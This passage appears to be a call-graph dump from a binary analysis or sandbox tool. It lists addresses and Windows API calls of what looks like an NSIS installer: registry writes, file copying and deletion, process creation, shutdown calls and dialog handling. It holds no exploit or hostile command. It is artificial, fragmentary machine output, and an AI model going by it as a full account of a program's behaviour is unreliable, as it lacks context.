4748->4749 4750 402515 4749->4750 4751 40145c 18 API calls 4750->4751 4752 40251f 4751->4752 4753 40145c 18 API calls 4752->4753 4754 402529 4753->4754 4755 40253d 4754->4755 4756 40145c 18 API calls 4754->4756 4757 4062a3 11 API calls 4755->4757 4756->4755 4758 40256a CoCreateInstance 4757->4758 4759 40258c 4758->4759 4760 40497c GetDlgItem GetDlgItem 4761 4049d2 7 API calls 4760->4761 4766 404bea 4760->4766 4762 404a76 DeleteObject 4761->4762 4763 404a6a SendMessageW 4761->4763 4764 404a81 4762->4764 4763->4762 4767 404ab8 4764->4767 4769 406805 18 API calls 4764->4769 4765 404ccf 4768 404d74 4765->4768 4773 404bdd 4765->4773 4778 404d1e SendMessageW 4765->4778 4766->4765 4776 40484e 5 API calls 4766->4776 4789 404c5a 4766->4789 4772 403d3f 19 API calls 4767->4772 4770 404d89 4768->4770 4771 404d7d SendMessageW 4768->4771 4775 404a9a SendMessageW SendMessageW 4769->4775 4780 404da2 4770->4780 4781 404d9b ImageList_Destroy 4770->4781 4791 404db2 4770->4791 4771->4770 4777 404acc 4772->4777 4779 403dca 8 API calls 4773->4779 4774 404cc1 SendMessageW 4774->4765 4775->4764 4776->4789 4782 403d3f 19 API calls 4777->4782 4778->4773 4784 404d33 SendMessageW 4778->4784 4785 404f6b 4779->4785 4786 404dab GlobalFree 4780->4786 4780->4791 4781->4780 4787 404add 4782->4787 4783 404f1c 4783->4773 4792 404f31 ShowWindow GetDlgItem ShowWindow 4783->4792 4788 404d46 4784->4788 4786->4791 4790 404baa GetWindowLongW SetWindowLongW 4787->4790 4799 404ba4 4787->4799 4802 404b39 SendMessageW 4787->4802 4803 404b67 SendMessageW 4787->4803 4804 404b7b SendMessageW 4787->4804 4798 404d57 SendMessageW 4788->4798 4789->4765 4789->4774 4793 404bc4 4790->4793 4791->4783 4794 404de4 4791->4794 4797 40141d 80 API calls 4791->4797 4792->4773 4795 404be2 4793->4795 4796 404bca ShowWindow 4793->4796 4807 404e12 SendMessageW 4794->4807 4810 404e28 4794->4810 4812 403d98 SendMessageW 4795->4812 4811 403d98 SendMessageW 4796->4811 4797->4794 4798->4768 4799->4790 4799->4793 4802->4787 4803->4787 4804->4787 4805 404ef3 InvalidateRect 4805->4783 4806 404f09 4805->4806 4813 4043ad 4806->4813 4807->4810 4809 404ea1 SendMessageW SendMessageW 4809->4810 4810->4805 4810->4809 4811->4773 4812->4766 4814 4043cd 4813->4814 4815 406805 18 API calls 4814->4815 4816 40440d 4815->4816 4817 406805 18 API calls 4816->4817 4818 404418 4817->4818 4819 406805 18 API calls 4818->4819 4820 404428 lstrlenW wsprintfW SetDlgItemTextW 4819->4820 4820->4783 4821 4026fc 4822 401ee4 4821->4822 4824 402708 4821->4824 4822->4821 4823 406805 18 API calls 4822->4823 4823->4822 4120 4019fd 4121 40145c 18 API calls 4120->4121 4122 401a04 4121->4122 4123 405e7f 2 API calls 4122->4123 4124 401a0b 4123->4124 4825 4022fd 4826 40145c 18 API calls 4825->4826 4827 402304 GetFileVersionInfoSizeW 4826->4827 4828 40232b GlobalAlloc 4827->4828 4832 4030e3 4827->4832 4829 40233f GetFileVersionInfoW 4828->4829 4828->4832 4830 402350 VerQueryValueW 4829->4830 4831 402381 GlobalFree 4829->4831 4830->4831 4834 402369 4830->4834 4831->4832 4838 405f51 wsprintfW 4834->4838 4836 402375 4839 405f51 wsprintfW 4836->4839 4838->4836 4839->4831 4840 402afd 4841 40145c 18 API calls 4840->4841 4842 402b04 4841->4842 4847 405e50 GetFileAttributesW CreateFileW 4842->4847 4844 402b10 4845 4030e3 4844->4845 4848 405f51 wsprintfW 4844->4848 4847->4844 4848->4845 4849 4029ff 4850 401553 19 API calls 4849->4850 4851 402a09 4850->4851 4852 40145c 18 API calls 4851->4852 4853 402a12 4852->4853 4854 402a1f RegQueryValueExW 4853->4854 4856 401a13 4853->4856 4855 402a3f 4854->4855 4859 402a45 4854->4859 4855->4859 4860 405f51 wsprintfW 4855->4860 4858 4029e4 RegCloseKey 4858->4856 4859->4856 4859->4858 4860->4859 4861 401000 4862 401037 BeginPaint GetClientRect 4861->4862 4863 40100c DefWindowProcW 4861->4863 4865 4010fc 4862->4865 4866 401182 4863->4866 4867 401073 CreateBrushIndirect FillRect DeleteObject 4865->4867 4868 401105 4865->4868 4867->4865 4869 401170 EndPaint 4868->4869 4870 40110b CreateFontIndirectW 4868->4870 4869->4866 4870->4869 4871 40111b 6 API calls 4870->4871 4871->4869 4872 401f80 4873 401446 18 API calls 4872->4873 4874 401f88 4873->4874 4875 401446 18 API calls 4874->4875 4876 401f93 4875->4876 4877 401fa3 4876->4877 4878 40145c 18 API calls 4876->4878 4879 401fb3 4877->4879 4880 40145c 18 API calls 4877->4880 4878->4877 4881 402006 4879->4881 4882 401fbc 4879->4882 4880->4879 4884 40145c 18 API calls 4881->4884 4883 401446 18 API calls 4882->4883 4886 401fc4 4883->4886 4885 40200d 4884->4885 4887 40145c 18 API calls 4885->4887 4888 401446 18 API calls 4886->4888 4889 402016 FindWindowExW 4887->4889 4890 401fce 4888->4890 4894 402036 4889->4894 4891 401ff6 SendMessageW 4890->4891 4892 401fd8 SendMessageTimeoutW 4890->4892 4891->4894 4892->4894 4893 4030e3 4894->4893 4896 405f51 wsprintfW 4894->4896 4896->4893 4897 402880 4898 402884 4897->4898 4899 40145c 18 API calls 4898->4899 4900 4028a7 4899->4900 4901 40145c 18 API calls 4900->4901 4902 4028b1 4901->4902 4903 4028ba RegCreateKeyExW 4902->4903 4904 4028e8 4903->4904 4911 4029ef 4903->4911 4905 402934 4904->4905 4906 40145c 18 API calls 4904->4906 4907 402963 4905->4907 4910 401446 18 API calls 4905->4910 4909 4028fc lstrlenW 4906->4909 4908 4029ae RegSetValueExW 4907->4908 4912 40337f 37 API calls 4907->4912 4915 4029c6 RegCloseKey 4908->4915 4916 4029cb 4908->4916 4913 402918 4909->4913 4914 40292a 4909->4914 4917 402947 4910->4917 4918 40297b 4912->4918 4919 4062a3 11 API calls 4913->4919 4920 4062a3 11 API calls 4914->4920 4915->4911 4921 4062a3 11 API calls 4916->4921 4922 4062a3 11 API calls 4917->4922 4928 406224 4918->4928 4924 402922 4919->4924 4920->4905 4921->4915 4922->4907 4924->4908 4927 4062a3 11 API calls 4927->4924 4929 406247 4928->4929 4930 40628a 4929->4930 4931 40625c wsprintfW 4929->4931 4932 402991 4930->4932 4933 406293 lstrcatW 4930->4933 4931->4930 4931->4931 4932->4927 4933->4932 4934 402082 4935 401446 18 API calls 4934->4935 4936 402093 SetWindowLongW 4935->4936 4937 4030e3 4936->4937 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3640 403859 3483->3640 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3491 403ae1 3647 405ca0 3491->3647 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3651 406009 lstrcpynW 3493->3651 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3652 40677e 3503->3652 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3682 406009 lstrcpynW 3509->3682 3681 406009 lstrcpynW 3510->3681 3515 403bef 3511->3515 3514 403b44 3683 406009 lstrcpynW 3514->3683 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3667 406009 lstrcpynW 3519->3667 3711 40141d 3520->3711 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3684 406805 3529->3684 3703 406c68 3529->3703 3708 405c3f CreateProcessW 3529->3708 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3714 406038 3546->3714 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3723 406722 lstrlenW CharPrevW 3549->3723 3730 405e50 GetFileAttributesW CreateFileW 3554->3730 3556 4035c7 3577 4035d7 3556->3577 3731 406009 lstrcpynW 3556->3731 3558 4035ed 3732 406751 lstrlenW 3558->3732 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3739 4032d2 3563->3739 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3773 403368 SetFilePointer 3565->3773 3750 403368 SetFilePointer 3567->3750 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3751 40337f 3571->3751 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3737 403336 ReadFile 3576->3737 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3806 405f51 wsprintfW 3585->3806 3807 405ed3 RegOpenKeyExW 3586->3807 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3797 403e95 3592->3797 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3813 403e74 3602->3813 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3614 403ac1 3605->3614 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3617 406722 3 API calls 3608->3617 3609->3608 3615 405a4d GetFileAttributesW 3609->3615 3611->3606 3618 405b6c 3612->3618 3619 405a2a 3613->3619 3668 4060e7 3614->3668 3620 405a59 3615->3620 3616 405a9c 3616->3604 3621 405a69 3617->3621 3618->3614 3624 403e95 19 API calls 3618->3624 3619->3607 3620->3608 3622 406751 2 API calls 3620->3622 3812 406009 lstrcpynW 3621->3812 3622->3608 3625 405b7d 3624->3625 3626 405b89 ShowWindow LoadLibraryW 3625->3626 3627 405c0c 3625->3627 3629 405ba8 LoadLibraryW 3626->3629 3630 405baf GetClassInfoW 3626->3630 3818 405047 OleInitialize 3627->3818 3629->3630 3631 405bc3 GetClassInfoW RegisterClassW 3630->3631 3632 405bd9 DialogBoxParamW 3630->3632 3631->3632 3634 40141d 80 API calls 3632->3634 3633 405c12 3635 405c16 3633->3635 3636 405c2e 3633->3636 3637 405c01 3634->3637 3635->3614 3639 40141d 80 API calls 3635->3639 3638 40141d 80 API calls 3636->3638 3637->3614 3638->3614 3639->3614 3641 403871 3640->3641 3642 403863 CloseHandle 3640->3642 3966 403c83 3641->3966 3642->3641 3648 405cb5 3647->3648 3649 403aef ExitProcess 3648->3649 3650 405ccb MessageBoxIndirectW 3648->3650 3650->3649 3651->3473 4023 406009 lstrcpynW 3652->4023 3654 40678f 3655 405d59 4 API calls 3654->3655 3656 406795 3655->3656 3657 406038 5 API calls 3656->3657 3664 403a97 3656->3664 3663 4067a5 3657->3663 3658 4067dd lstrlenW 3659 4067e4 3658->3659 3658->3663 3660 406722 3 API calls 3659->3660 3662 4067ea GetFileAttributesW 3660->3662 3661 4062d5 2 API calls 3661->3663 3662->3664 3663->3658 3663->3661 3663->3664 3665 406751 2 API calls 3663->3665 3664->3483 3666 406009 lstrcpynW 3664->3666 3665->3658 3666->3519 3667->3486 3669 406110 3668->3669 3670 4060f3 3668->3670 3672 406187 3669->3672 3673 40612d 3669->3673 3676 406104 3669->3676 3671 4060fd CloseHandle 3670->3671 3670->3676 3671->3676 3674 406190 lstrcatW lstrlenW WriteFile 3672->3674 3672->3676 3673->3674 3675 406136 GetFileAttributesW 3673->3675 3674->3676 4024 405e50 GetFileAttributesW CreateFileW 3675->4024 3676->3483 3678 406152 3678->3676 3679 406162 WriteFile 3678->3679 3680 40617c SetFilePointer 3678->3680 3679->3680 3680->3672 3681->3509 3682->3514 3683->3529 3697 406812 3684->3697 3685 406a7f 3686 403b6c DeleteFileW 3685->3686 4027 406009 lstrcpynW 3685->4027 3686->3527 3686->3529 3688 4068d3 GetVersion 3700 4068e0 3688->3700 3689 406a46 lstrlenW 3689->3697 3690 406805 10 API calls 3690->3689 3693 405ed3 3 API calls 3693->3700 3694 406952 GetSystemDirectoryW 3694->3700 3695 406965 GetWindowsDirectoryW 3695->3700 3696 406038 5 API calls 3696->3697 3697->3685 3697->3688 3697->3689 3697->3690 3697->3696 4025 405f51 wsprintfW 3697->4025 4026 406009 lstrcpynW 3697->4026 3698 406805 10 API calls 3698->3700 3699 4069df lstrcatW 3699->3697 3700->3693 3700->3694 3700->3695 3700->3697 3700->3698 3700->3699 3701 406999 SHGetSpecialFolderLocation 3700->3701 3701->3700 3702 4069b1 SHGetPathFromIDListW CoTaskMemFree 3701->3702 3702->3700 3704 4062fc 3 API calls 3703->3704 3705 406c6f 3704->3705 3707 406c90 3705->3707 4028 406a99 lstrcpyW 3705->4028 3707->3529 3709 405c7a 3708->3709 3710 405c6e CloseHandle 3708->3710 3709->3529 3710->3709 3712 40139d 80 API calls 3711->3712 3713 401432 3712->3713 3713->3495 3720 406045 3714->3720 3715 4060bb 3716 4060c1 CharPrevW 3715->3716 3718 4060e1 3715->3718 3716->3715 3717 4060ae CharNextW 3717->3715 3717->3720 3718->3549 3719 405d06 CharNextW 3719->3720 3720->3715 3720->3717 3720->3719 3721 40609a CharNextW 3720->3721 3722 4060a9 CharNextW 3720->3722 3721->3720 3722->3717 3724 4037ea CreateDirectoryW 3723->3724 3725 40673f lstrcatW 3723->3725 3726 405e7f 3724->3726 3725->3724 3727 405e8c GetTickCount GetTempFileNameW 3726->3727 3728 405ec2 3727->3728 3729 4037fe 3727->3729 3728->3727 3728->3729 3729->3475 3730->3556 3731->3558 3733 406760 3732->3733 3734 4035f3 3733->3734 3735 406766 CharPrevW 3733->3735 3736 406009 lstrcpynW 3734->3736 3735->3733 3735->3734 3736->3562 3738 403357 3737->3738 3738->3576 3740 4032f3 3739->3740 3741 4032db 3739->3741 3744 403303 GetTickCount 3740->3744 3745 4032fb 3740->3745 3742 4032e4 DestroyWindow 3741->3742 3743 4032eb 3741->3743 3742->3743 3743->3565 3747 403311 CreateDialogParamW ShowWindow 3744->3747 3748 403334 3744->3748 3774 406332 3745->3774 3747->3748 3748->3565 3750->3571 3753 403398 3751->3753 3752 4033c3 3755 403336 ReadFile 3752->3755 3753->3752 3785 403368 SetFilePointer 3753->3785 3756 4033ce 3755->3756 3757 4033e7 GetTickCount 3756->3757 3758 403518 3756->3758 3760 4033d2 3756->3760 3770 4033fa 3757->3770 3759 40351c 3758->3759 3764 403540 3758->3764 3761 403336 ReadFile 3759->3761 3760->3580 3761->3760 3762 403336 ReadFile 3762->3764 3763 403336 ReadFile 3763->3770 3764->3760 3764->3762 3765 40355f WriteFile 3764->3765 3765->3760 3766 403574 3765->3766 3766->3760 3766->3764 3768 40345c GetTickCount 3768->3770 3769 403485 MulDiv wsprintfW 3786 404f72 3769->3786 3770->3760 3770->3763 3770->3768 3770->3769 3772 4034c9 WriteFile 3770->3772 3778 407312 3770->3778 3772->3760 3772->3770 3773->3572 3775 40634f PeekMessageW 3774->3775 3776 406345 DispatchMessageW 3775->3776 3777 403301 3775->3777 3776->3775 3777->3565 3779 407332 3778->3779 3780 40733a 3778->3780 3779->3770 3780->3779 3781 4073c2 GlobalFree 3780->3781 3782 4073cb GlobalAlloc 3780->3782 3783 407443 GlobalAlloc 3780->3783 3784 40743a GlobalFree 3780->3784 3781->3782 3782->3779 3782->3780 3783->3779 3783->3780 3784->3783 3785->3752 3787 404f8b 3786->3787 3796 40502f 3786->3796 3788 404fa9 lstrlenW 3787->3788 3789 406805 18 API calls 3787->3789 3790 404fd2 3788->3790 3791 404fb7 lstrlenW 3788->3791 3789->3788 3793 404fe5 3790->3793 3794 404fd8 SetWindowTextW 3790->3794 3792 404fc9 lstrcatW 3791->3792 3791->3796 3792->3790 3795 404feb SendMessageW SendMessageW SendMessageW 3793->3795 3793->3796 3794->3793 3795->3796 3796->3770 3798 403ea9 3797->3798 3826 405f51 wsprintfW 3798->3826 3800 403f1d 3801 406805 18 API calls 3800->3801 3802 403f29 SetWindowTextW 3801->3802 3804 403f44 3802->3804 3803 403f5f 3803->3595 3804->3803 3805 406805 18 API calls 3804->3805 3805->3804 3806->3592 3808 405f07 RegQueryValueExW 3807->3808 3809 405989 3807->3809 3810 405f29 RegCloseKey 3808->3810 3809->3590 3809->3591 3810->3809 3812->3597 3827 406009 lstrcpynW 3813->3827 3815 403e88 3816 406722 3 API calls 3815->3816 3817 403e8e lstrcatW 3816->3817 3817->3616 3828 403daf 3818->3828 3820 40506a 3823 4062a3 11 API calls 3820->3823 3825 405095 3820->3825 3831 40139d 3820->3831 3821 403daf SendMessageW 3822 4050a5 OleUninitialize 3821->3822 3822->3633 3823->3820 3825->3821 3826->3800 3827->3815 3829 403dc7 3828->3829 3830 403db8 SendMessageW 3828->3830 3829->3820 3830->3829 3834 4013a4 3831->3834 3832 401410 3832->3820 3834->3832 3835 4013dd MulDiv SendMessageW 3834->3835 3836 4015a0 3834->3836 3835->3834 3837 4015fa 3836->3837 3916 40160c 3836->3916 3838 401601 3837->3838 3839 401742 3837->3839 3840 401962 3837->3840 3841 4019ca 3837->3841 3842 40176e 3837->3842 3843 401650 3837->3843 3844 4017b1 3837->3844 3845 401672 3837->3845 3846 401693 3837->3846 3847 401616 3837->3847 3848 4016d6 3837->3848 3849 401736 3837->3849 3850 401897 3837->3850 3851 4018db 3837->3851 3852 40163c 3837->3852 3853 4016bd 3837->3853 3837->3916 3866 4062a3 11 API calls 3838->3866 3858 401751 ShowWindow 3839->3858 3859 401758 3839->3859 3863 40145c 18 API calls 3840->3863 3856 40145c 18 API calls 3841->3856 3860 40145c 18 API calls 3842->3860 3943 4062a3 lstrlenW wvsprintfW 3843->3943 3949 40145c 3844->3949 3861 40145c 18 API calls 3845->3861 3946 401446 3846->3946 3855 40145c 18 API calls 3847->3855 3872 401446 18 API calls 3848->3872 3848->3916 3849->3916 3965 405f51 wsprintfW 3849->3965 3862 40145c 18 API calls 3850->3862 3867 40145c 18 API calls 3851->3867 3857 401647 PostQuitMessage 3852->3857 3852->3916 3854 4062a3 11 API calls 3853->3854 3869 4016c7 SetForegroundWindow 3854->3869 3870 40161c 3855->3870 3871 4019d1 SearchPathW 3856->3871 3857->3916 3858->3859 3873 401765 ShowWindow 3859->3873 3859->3916 3874 401775 3860->3874 3875 401678 3861->3875 3876 40189d 3862->3876 3877 401968 GetFullPathNameW 3863->3877 3866->3916 3868 4018e2 3867->3868 3880 40145c 18 API calls 3868->3880 3869->3916 3881 4062a3 11 API calls 3870->3881 3871->3916 3872->3916 3873->3916 3884 4062a3 11 API calls 3874->3884 3885 4062a3 11 API calls 3875->3885 3961 4062d5 FindFirstFileW 3876->3961 3887 40197f 3877->3887 3929 4019a1 3877->3929 3879 40169a 3889 4062a3 11 API calls 3879->3889 3890 4018eb 3880->3890 3891 401627 3881->3891 3893 401785 SetFileAttributesW 3884->3893 3894 401683 3885->3894 3911 4062d5 2 API calls 3887->3911 3887->3929 3888 4062a3 11 API calls 3896 4017c9 3888->3896 3897 4016a7 Sleep 3889->3897 3899 40145c 18 API calls 3890->3899 3900 404f72 25 API calls 3891->3900 3902 40179a 3893->3902 3893->3916 3909 404f72 25 API calls 3894->3909 3954 405d59 CharNextW CharNextW 3896->3954 3897->3916 3898 4019b8 GetShortPathNameW 3898->3916 3907 4018f5 3899->3907 3900->3916 3901 40139d 65 API calls 3901->3916 3908 4062a3 11 API calls 3902->3908 3903 4018c2 3912 4062a3 11 API calls 3903->3912 3904 4018a9 3910 4062a3 11 API calls 3904->3910 3914 4062a3 11 API calls 3907->3914 3908->3916 3909->3916 3910->3916 3915 401991 3911->3915 3912->3916 3913 4017d4 3917 401864 3913->3917 3920 405d06 CharNextW 3913->3920 3938 4062a3 11 API calls 3913->3938 3918 401902 MoveFileW 3914->3918 3915->3929 3964 406009 lstrcpynW 3915->3964 3916->3834 3917->3894 3919 40186e 3917->3919 3921 401912 3918->3921 3922 40191e 3918->3922 3923 404f72 25 API calls 3919->3923 3925 4017e6 CreateDirectoryW 3920->3925 3921->3894 3927 401942 3922->3927 3932 4062d5 2 API calls 3922->3932 3928 401875 3923->3928 3925->3913 3926 4017fe GetLastError 3925->3926 3930 401827 GetFileAttributesW 3926->3930 3931 40180b GetLastError 3926->3931 3937 4062a3 11 API calls 3927->3937 3960 406009 lstrcpynW 3928->3960 3929->3898 3929->3916 3930->3913 3934 4062a3 11 API calls 3931->3934 3935 401929 3932->3935 3934->3913 3935->3927 3940 406c68 42 API calls 3935->3940 3936 401882 SetCurrentDirectoryW 3936->3916 3939 40195c 3937->3939 3938->3913 3939->3916 3941 401936 3940->3941 3942 404f72 25 API calls 3941->3942 3942->3927 3944 4060e7 9 API calls 3943->3944 3945 401664 3944->3945 3945->3901 3947 406805 18 API calls 3946->3947 3948 401455 3947->3948 3948->3879 3950 406805 18 API calls 3949->3950 3951 401488 3950->3951 3952 401497 3951->3952 3953 406038 5 API calls 3951->3953 3952->3888 3953->3952 3955 405d76 3954->3955 3956 405d88 3954->3956 3955->3956 3957 405d83 CharNextW 3955->3957 3958 405dac 3956->3958 3959 405d06 CharNextW 3956->3959 3957->3958 3958->3913 3959->3956 3960->3936 3962 4018a5 3961->3962 3963 4062eb FindClose 3961->3963 3962->3903 3962->3904 3963->3962 3964->3929 3965->3916 3967 403c91 3966->3967 3968 403876 3967->3968 3969 403c96 FreeLibrary GlobalFree 3967->3969 3970 406c9b 3968->3970 3969->3968 3969->3969 3971 40677e 18 API calls 3970->3971 3972 406cae 3971->3972 3973 406cb7 DeleteFileW 3972->3973 3974 406cce 3972->3974 4014 403882 OleUninitialize 3973->4014 3975 406e4b 3974->3975 4018 406009 lstrcpynW 3974->4018 3981 4062d5 2 API calls 3975->3981 4003 406e58 3975->4003 3975->4014 3977 406cf9 3978 406d03 lstrcatW 3977->3978 3979 406d0d 3977->3979 3980 406d13 3978->3980 3982 406751 2 API calls 3979->3982 3984 406d23 lstrcatW 3980->3984 3985 406d19 3980->3985 3983 406e64 3981->3983 3982->3980 3988 406722 3 API calls 3983->3988 3983->4014 3987 406d2b lstrlenW FindFirstFileW 3984->3987 3985->3984 3985->3987 3986 4062a3 11 API calls 3986->4014 3989 406e3b 3987->3989 3993 406d52 3987->3993 3990 406e6e 3988->3990 3989->3975 3992 4062a3 11 API calls 3990->3992 3991 405d06 CharNextW 3991->3993 3994 406e79 3992->3994 3993->3991 3997 406e18 FindNextFileW 3993->3997 4006 406c9b 72 API calls 3993->4006 4013 404f72 25 API calls 3993->4013 4015 4062a3 11 API calls 3993->4015 4016 404f72 25 API calls 3993->4016 4017 406c68 42 API calls 3993->4017 4019 406009 lstrcpynW 3993->4019 4020 405e30 GetFileAttributesW 3993->4020 3995 405e30 2 API calls 3994->3995 3996 406e81 RemoveDirectoryW 3995->3996 4000 406ec4 3996->4000 4001 406e8d 3996->4001 3997->3993 3999 406e30 FindClose 3997->3999 3999->3989 4002 404f72 25 API calls 4000->4002 4001->4003 4004 406e93 4001->4004 4002->4014 4003->3986 4005 4062a3 11 API calls 4004->4005 4007 406e9d 4005->4007 4006->3993 4009 404f72 25 API calls 4007->4009 4011 406ea7 4009->4011 4012 406c68 42 API calls 4011->4012 4012->4014 4013->3997 4014->3491 4014->3492 4015->3993 4016->3993 4017->3993 4018->3977 4019->3993 4021 405e4d DeleteFileW 4020->4021 4022 405e3f SetFileAttributesW 4020->4022 4021->3993 4022->4021 4023->3654 4024->3678 4025->3697 4026->3697 4027->3686 4029 406ae7 GetShortPathNameW 4028->4029 4030 406abe 4028->4030 4031 406b00 4029->4031 4032 406c62 4029->4032 4054 405e50 GetFileAttributesW CreateFileW 4030->4054 4031->4032 4034 406b08 WideCharToMultiByte 4031->4034 4032->3707 4034->4032 4036 406b25 WideCharToMultiByte 4034->4036 4035 406ac7 CloseHandle GetShortPathNameW 4035->4032 4037 406adf 4035->4037 4036->4032 4038 406b3d wsprintfA 4036->4038 4037->4029 4037->4032 4039 406805 18 API calls 4038->4039 4040 406b69 4039->4040 4055 405e50 GetFileAttributesW CreateFileW 4040->4055 4042 406b76 4042->4032 4043 406b83 GetFileSize GlobalAlloc 4042->4043 4044 406ba4 ReadFile 4043->4044 4045 406c58 CloseHandle 4043->4045 4044->4045 4046 406bbe 4044->4046 4045->4032 4046->4045 4056 405db6 lstrlenA 4046->4056 4049 406bd7 lstrcpyA 4052 406bf9 4049->4052 4050 406beb 4051 405db6 4 API calls 4050->4051 4051->4052 4053 406c30 SetFilePointer WriteFile GlobalFree 4052->4053 4053->4045 4054->4035 4055->4042 4057 405df7 lstrlenA 4056->4057 4058 405dd0 lstrcmpiA 4057->4058 4059 405dff 4057->4059 4058->4059 4060 405dee CharNextA 4058->4060 4059->4049 4059->4050 4060->4057 4938 402a84 4939 401553 19 API calls 4938->4939 4940 402a8e 4939->4940 4941 401446 18 API calls 4940->4941 4942 402a98 4941->4942 4943 401a13 4942->4943 4944 402ab2 RegEnumKeyW 4942->4944 4945 402abe RegEnumValueW 4942->4945 4946 402a7e 4944->4946 4945->4943 4945->4946 4946->4943 4947 4029e4 RegCloseKey 4946->4947 4947->4943 4948 402c8a 4949 402ca2 4948->4949 4950 402c8f 4948->4950 4952 40145c 18 API calls 4949->4952 4951 401446 18 API calls 4950->4951 4954 402c97 4951->4954 4953 402ca9 lstrlenW 4952->4953 4953->4954 4955 402ccb WriteFile 4954->4955 4956 401a13 4954->4956 4955->4956 4957 40400d 4958 40406a 4957->4958 4959 40401a lstrcpynA lstrlenA 4957->4959 4959->4958 4960 40404b 4959->4960 4960->4958 4961 404057 GlobalFree 4960->4961 4961->4958 4962 401d8e 4963 40145c 18 API calls 4962->4963 4964 401d95 ExpandEnvironmentStringsW 4963->4964 4965 401da8 4964->4965 4967 401db9 4964->4967 4966 401dad lstrcmpW 4965->4966 4965->4967 4966->4967 4968 401e0f 4969 401446 18 API calls 4968->4969 4970 401e17 4969->4970 4971 401446 18 API calls 4970->4971 4972 401e21 4971->4972 4973 4030e3 4972->4973 4975 405f51 wsprintfW 4972->4975 4975->4973 4976 402392 4977 40145c 18 API calls 4976->4977 4978 402399 4977->4978 4981 4071f8 4978->4981 4982 406ed2 25 API calls 4981->4982 4983 407218 4982->4983 4984 407222 lstrcpynW lstrcmpW 4983->4984 4985 4023a7 4983->4985 4986 407254 4984->4986 4987 40725a lstrcpynW 4984->4987 4986->4987 4987->4985 4061 402713 4076 406009 lstrcpynW 4061->4076 4063 40272c 4077 406009 lstrcpynW 4063->4077 4065 402738 4066 40145c 18 API calls 4065->4066 4068 402743 4065->4068 4066->4068 4067 402752 4070 40145c 18 API calls 4067->4070 4072 402761 4067->4072 4068->4067 4069 40145c 18 API calls 4068->4069 4069->4067 4070->4072 4071 40145c 18 API calls 4073 40276b 4071->4073 4072->4071 4074 4062a3 11 API calls 4073->4074 4075 40277f WritePrivateProfileStringW 4074->4075 4076->4063 4077->4065 4988 402797 4989 40145c 18 API calls 4988->4989 4990 4027ae 4989->4990 4991 40145c 18 API calls 4990->4991 4992 4027b7 4991->4992 4993 40145c 18 API calls 4992->4993 4994 4027c0 GetPrivateProfileStringW lstrcmpW 4993->4994 4995 402e18 4996 40145c 18 API calls 4995->4996 4997 402e1f FindFirstFileW 4996->4997 4998 402e32 4997->4998 5003 405f51 wsprintfW 4998->5003 5000 402e43 5004 406009 lstrcpynW 5000->5004 5002 402e50 5003->5000 5004->5002 5005 401e9a 5006 40145c 18 API calls 5005->5006 5007 401ea1 5006->5007 5008 401446 18 API calls 5007->5008 5009 401eab wsprintfW 5008->5009 4132 401a1f 4133 40145c 18 API calls 4132->4133 4134 401a26 4133->4134 4135 4062a3 11 API calls 4134->4135 4136 401a49 4135->4136 4137 401a64 4136->4137 4138 401a5c 4136->4138 4186 406009 lstrcpynW 4137->4186 4185 406009 lstrcpynW 4138->4185 4141 401a62 4145 406038 5 API calls 4141->4145 4142 401a6f 